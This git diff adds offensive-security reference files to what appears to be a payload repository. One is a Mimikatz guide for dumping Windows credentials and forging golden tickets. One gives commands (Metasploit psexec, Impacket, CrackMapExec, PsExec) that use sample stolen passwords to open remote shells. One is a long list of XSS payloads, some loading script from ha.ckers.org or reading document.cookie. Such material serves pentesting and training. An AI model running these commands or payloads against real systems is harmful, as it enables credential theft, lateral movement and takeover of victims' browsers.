diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md new file mode 100644 index 0000000..e9ab5ee --- /dev/null +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -0,0 +1,64 @@ +# Windows - Mimikatz + +![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) + +## Mimikatz basic +Only one command +```bash +PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit +``` + +Mimikatz console (multiple commands) +```bash +PS C:\temp\mimikatz> .\mimikatz +mimikatz # privilege::debug +mimikatz # sekurlsa::logonpasswords +``` + +Mimikatz Golden ticket +``` +.\mimikatz kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt + +.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit +``` + + + +## Mimikatz commands +| Command |Definition| +|:----------------:|:---------------| +| CRYPTO::Certificates|list/export certificates| +|CRYPTO::Certificates | list/export certificates| +|KERBEROS::Golden | create golden/silver/trust tickets| +|KERBEROS::List | list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.| +|KERBEROS::PTT | pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).| +|LSADUMP::DCSync | ask a DC to synchronize an object (get password data for account). No need to run code on DC.| +|LSADUMP::LSA | Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”| +|LSADUMP::SAM | get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.| +|LSADUMP::Trust | Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).| +|MISC::AddSid | Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.| +|MISC::MemSSP | Inject a malicious Windows SSP to log locally authenticated credentials.| +|MISC::Skeleton | Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.| +|PRIVILEGE::Debug | get debug rights (this or Local System rights is required for many Mimikatz commands).| +|SEKURLSA::Ekeys | list Kerberos encryption keys| +|SEKURLSA::Kerberos | List Kerberos credentials for all authenticated users (including services and computer account)| +|SEKURLSA::Krbtgt | get Domain Kerberos service account (KRBTGT)password data| +|SEKURLSA::LogonPasswords | lists all available provider credentials. This usually shows recently logged on user and computer credentials.| +|SEKURLSA::Pth | Pass- theHash and Over-Pass-the-Hash| +|SEKURLSA::Tickets | Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).| +|TOKEN::List | list all tokens of the system| +|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box| +|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials. + + + +## Powershell Mimikatz +Mimikatz in memory (no binary on disk) with : + - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire + - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit + +More informations can be grabbed from the Memory with : + - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1) + +## Thanks to + * [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md new file mode 100644 index 0000000..5c92e8e --- /dev/null +++ b/Methodology and Resources/Windows - Using credentials.md @@ -0,0 +1,70 @@ +# Windows - Using credentials + +## Metasploit - SMB +```c +use auxiliary/scanner/smb/smb_login +set SMBDomain CSCOU +set SMBUser jarrieta +set SMBPass nastyCutt3r +services -p 445 -R +run +creds +``` + +## Metasploit - Psexec +```c +use exploit/windows/smb/psexec +set RHOST 10.2.0.3 +set SMBUser jarrieta +set SMBPass nastyCutt3r +set PAYLOAD windows/meterpreter/bind_tcp +run +shell +``` + +## Crackmapexec (Integrated to Kali) +```python +git clone https://github.com/byt3bl33d3r/CrackMapExec.github +python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r +python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami +``` + +## Winexe (Integrated to Kali) +```python +winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe +``` + +## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) +```python +git clone https://github.com/CoreSecurity/impacket.git +python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 +python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 +python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 +``` + +## RDP Remote Desktop Protocol (Impacket) +``` +python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 +rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 +``` + +## Netuse (Windows) +``` +net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r +C$ +``` + +## Runas (Windows - Kerberos auth) +``` +runas /netonly /user:CSCOU\jarrieta "cmd.exe" +``` + +## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ) +``` +PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe +PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell +``` + +## Thanks + - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) +- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) diff --git a/XSS injection/Intruders/xss_alert.txt b/XSS injection/Intruders/xss_alert.txt new file mode 100644 index 0000000..5a78ca7 --- /dev/null +++ b/XSS injection/Intruders/xss_alert.txt @@ -0,0 +1,666 @@ +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +\x3Cscript>javascript:alert(1) +'"`> + + +--> --> +--> +--> +--> +`"'>

+test +test +test +test +test +test +test +test +test +test +test +test +test +test + + + + + + + +"'`>ABC
DEF +"'`>ABC
DEF + + + +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> + + + + +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> + + + + +alert(1)0 +
+ + + + +"> +"> +"> +"> + +<% foo> +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +XXX + + + +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo ;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror =javascript:alert(1)>"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="javAascript:javascript:alert(1)">test1</a> +<a href="javaascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// + + + + + +